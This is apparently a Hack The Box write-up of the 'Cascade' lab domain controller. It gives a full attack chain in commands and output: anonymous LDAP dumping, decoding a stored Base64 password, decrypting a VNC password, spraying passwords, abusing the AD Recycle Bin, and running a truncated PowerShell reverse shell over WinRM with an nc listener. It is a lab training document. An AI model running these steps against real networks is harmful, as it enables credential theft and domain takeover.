🪴 Quartz 4.0

HTB - Cascade

May 04, 20267 min read

HTB - Cascade

Target IP: 10.129.7.238 Domain: cascade.local DC Hostname: CASC-DC1.cascade.local OS: Windows Server 2008 R2 SP1 (Domain Controller) Difficulty: Medium Author: [g1nt0n1c]

1. Phase 1: Reconnaissance & Information Gathering

1.1 TCP Port Discovery

# Full port scan with version/script detection, verbose output, saved to all formats
nmap 10.129.7.238 -sV -sC -p- -v -oA nmap/cascade

Port Analysis & Attack Surface

PortServiceNotes
53/tcpDNSWindows DNS — confirms this is a DC
88/tcpKerberosDomain Controller confirmed
135/tcpMS-RPCStandard Windows RPC
139/tcpNetBIOSLegacy SMB name service
389/tcpLDAPHigh value — domain: cascade.local, queryable without auth
445/tcpSMBFile shares, lateral movement
5985/tcpWinRMRemote shell if valid credentials found
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS 6.1.7601 (Windows Server 2008 R2 SP1)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0
Service Info: Host: CASC-DC1; OS: Windows Server 2008 R2 SP1

| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required

Key observation: SMB signing is required — relay attacks are blocked. LDAP on 389 is the most interesting entry point.

1.2 Local Host Resolution

# Add both the FQDN and short domain name for full resolution
echo "10.129.7.238  CASC-DC1.cascade.local cascade.local" | sudo tee -a /etc/hosts

2. Phase 2: LDAP Enumeration & Credential Discovery

2.1 Validate LDAP Null Bind

Test whether the LDAP server allows unauthenticated queries (null bind). A [+] response means we can dump directory objects without credentials.

# Attempt anonymous LDAP bind
nxc ldap 10.129.7.238 -u '' -p ''
# [+] cascade.local\:

2.2 Dump All User Objects via LDAP

Query every user object and return all attributes. This reveals non-standard fields that administrators may have populated with sensitive data.

# Return all attributes (*) for every user object in the directory
nxc ldap 10.129.7.238 --query "(objectClass=user)" "*"

Key finding — r.thompson has a non-standard attribute:

[+] Response for object: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd   clk0bjVldmE=

cascadeLegacyPwd is a custom AD attribute. The trailing = is a Base64 padding character.

2.3 Decode the Legacy Password

# Decode the Base64 string
echo "clk0bjVldmE=" | base64 -d
# rY4n5eva

2.4 Validate Credentials

# Confirm r.thompson's credentials work over SMB
nxc smb 10.129.7.238 -u r.thompson -p rY4n5eva
# [+] cascade.local\r.thompson:rY4n5eva

3. Phase 3: Initial Access (r.thompson → s.smith)

3.1 Enumerate SMB Shares

# List all shares and r.thompson's access level for each
nxc smb 10.129.7.238 -u r.thompson -p rY4n5eva --shares
Share        Permissions    Remark
-----        -----------    ------
ADMIN$                      Remote Admin
Audit$                      (no access)
Data         READ
NETLOGON     READ           Logon server share
print$       READ           Printer Drivers
SYSVOL       READ           Logon server share

3.2 Spider the Data Share

Recursively enumerate all readable files and save an index. This is faster than manually browsing large share trees.

# Spider all readable shares and output a JSON file map
nxc smb 10.129.7.238 -u r.thompson -p rY4n5eva -M spider_plus

3.3 Download All Files from Data Share

# Connect to the Data share, disable prompts, enable recursion, download everything
smbclient //10.129.7.238/Data -U r.thompson
prompt off
recurse on
mget *

Key finding: IT/Temp/s.smith/VNC Install.reg — a registry export containing an encrypted VNC password:

"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

3.4 Decrypt the VNC Password

VNC (RealVNC / TightVNC) stores passwords encrypted with a fixed DES key. The key is public and the cipher is symmetric — a purpose-built tool can reverse it directly.

# Clone the VNC password decryptor
git clone https://github.com/jeroennijhof/vncpwd.git
cd vncpwd && make
 
# Convert the hex dump to raw bytes and save to a file
printf '\x6b\xcf\x2a\x4b\x6e\x5a\xca\x0f' > vnc.enc
 
# Decrypt the password
./vncpwd vnc.enc
# Password: sT333ve2

3.5 Validate s.smith Credentials

nxc smb 10.129.7.238 -u s.smith -p sT333ve2
# [+] cascade.local\s.smith:sT333ve2

3.6 Open Shell as s.smith

Generate a Base64 PowerShell reverse shell at revshells.com, then execute it via WinRM.

# Start listener
rlwrap nc -lvnp 5555
 
# Execute reverse shell payload via WinRM
nxc winrm 10.129.7.238 -u s.smith -p sT333ve2 -X "powershell -e JABjAGwAaQBlAG4Ad..."
# PS C:\Users\s.smith\Documents> whoami
# cascade\s.smith

4. Phase 4: Lateral Movement (s.smith → arksvc via Reverse Engineering)

4.1 Enumerate New Share Access

s.smith has READ on Audit$ — the share that r.thompson could not access.

nxc smb 10.129.7.238 -u s.smith -p sT333ve2 --shares
# Audit$    READ    <= NOW READABLE

4.2 Download Audit$ Contents

smbclient //10.129.7.238/Audit$ -U s.smith
prompt off
recurse on
mget *

Contents:

.
├── CascAudit.exe       ← .NET binary, candidate for reverse engineering
├── CascCrypto.dll      ← Custom crypto library used by the exe
├── DB/
│   └── Audit.db        ← SQLite database
├── RunAudit.bat        ← Reveals how the exe is invoked
├── System.Data.SQLite.dll
└── x64/x86/SQLite.Interop.dll

RunAudit.bat shows the invocation:

CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

4.3 Reverse Engineer CascAudit.exe with dnSpy

CascAudit.exe is a .NET binary — dnSpy can decompile it back to near-original C# without any setup.

  1. Open dnSpyFileOpen → select CascAudit.exe
  2. In the assembly tree, navigate to the CascAudit namespace → Main() method
  3. Locate the decryption call: 
    password = Crypto.DecryptString(text, "c4scadek3y654321");
    The AES key is hardcoded. text is the ciphertext pulled from Audit.db.
  4. Right-click the line → Add Breakpoint
  5. Click Start at the top — when prompted for arguments, provide the path to Audit.db (as seen in RunAudit.bat)
  6. Step through — the debugger reveals the decrypted password: w3lc0meFr31nd

4.4 Password Spray with Recovered Password

# Spray decrypted password against all known domain users
nxc smb 10.129.7.238 -u usernames.txt -p w3lc0meFr31nd
# [+] cascade.local\arksvc:w3lc0meFr31nd

4.5 Shell as arksvc

rlwrap nc -lvnp 5555
nxc winrm 10.129.7.238 -u arksvc -p w3lc0meFr31nd -X "powershell -e JABjAGwAaQ..."
# PS C:\Users\arksvc\Documents> whoami
# cascade\arksvc

5. Phase 5: Privilege Escalation (AD Recycle Bin → Administrator)

5.1 Identify Group Memberships

# Check local and domain group memberships for arksvc
net user arksvc
# Local Group Memberships: AD Recycle Bin

AD Recycle Bin is a privileged group that can read — and restore — deleted Active Directory objects, including all their attributes.

5.2 Recall the Intelligence from the Data Share

The file Data/IT/Email Archives/Meeting Notes.html (found during r.thompson’s share enumeration) contained:

“We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018. Username is TempAdmin (password is the same as the normal admin account password).”

If TempAdmin was deleted rather than permanently purged, its attributes — including cascadeLegacyPwd — should still exist in the Recycle Bin.

5.3 Find the Deleted Object

# List all soft-deleted AD objects (excludes the container itself)
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
# Name: TempAdmin DEL:f0cc344d-31e0-4866-bceb-a842791ca059
# ObjectClass: user

5.4 Recover All Attributes of TempAdmin

# Retrieve every attribute of the deleted TempAdmin object
Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *
# cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz   ← same custom field as r.thompson

5.5 Decode the Password

echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
# baCT3r1aN00dles

5.6 Validate Administrator Access

nxc smb 10.129.7.238 -u administrator -p baCT3r1aN00dles
# [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)

Deep Dive: LDAP Null Bind & Custom AD Attributes

Active Directory allows administrators to extend the schema with custom attributes. cascadeLegacyPwd is not a standard field — it was added by the Cascade administrators to store a legacy password during a migration. Because LDAP null bind was allowed, any unauthenticated user on the network could query it.

Why this matters: Custom AD attributes are rarely audited by security tools and are often overlooked in pen tests. Always dump the full attribute set (*) rather than a predefined list when enumerating user objects.

Deep Dive: VNC Fixed-Key Encryption

TightVNC and older RealVNC versions encrypt stored passwords with DES using the fixed key \xe8\x4a\xd6\x60\xc4\x72\x1a\xe0. This is a symmetric cipher with a public key — “encryption” here provides no real security. Any password stored in a registry export (.reg) or ultravnc.ini can be trivially decrypted with the key.

Deep Dive: AD Recycle Bin Privilege Abuse

The AD Recycle Bin was introduced in Windows Server 2008 R2 to allow recovery of deleted objects. Unlike the older “tombstone” mechanism, the Recycle Bin preserves all object attributes for a configurable period (default: 180 days). Members of the AD Recycle Bin group can read these deleted objects via PowerShell’s Get-ADObject -includeDeletedObjects.

Attack path: If a privileged account (e.g., a temp admin with the same password as the real admin) was deleted instead of having its password rotated, its credentials survive in the Recycle Bin. This is a common finding in environments that clean up accounts by deleting rather than disabling + rotating.

Graph View

Backlinks